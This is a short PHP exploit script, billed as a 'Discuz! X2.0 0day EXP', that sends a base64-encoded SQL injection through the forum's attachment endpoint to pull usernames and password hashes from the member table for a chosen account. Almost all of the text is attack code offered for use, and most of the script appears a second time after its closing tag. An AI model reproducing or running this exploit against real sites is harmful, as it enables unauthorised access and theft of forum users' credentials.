<?php
echo "Discuz! X2.0
0day EXP\n";
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>
echo "By:Steeltiger \n";
echo "php.exe dz2exp.php http://www.xxx.com/ admin\n";
if(!empty($argv[1]) &&!empty($argv[2]))
{
echo "Start\n";
$exp = base64_encode("1' and 1=2 union all select 1,group_concat(username,0x7C3274747C,password) from pre_common_member where username like '".$argv[2]."|x|y");
$url = "forum.php?mod=attachment&findpost=ss&aid=";
file_get_contents($argv[1].$url.$exp);
echo "End\n";
}
?>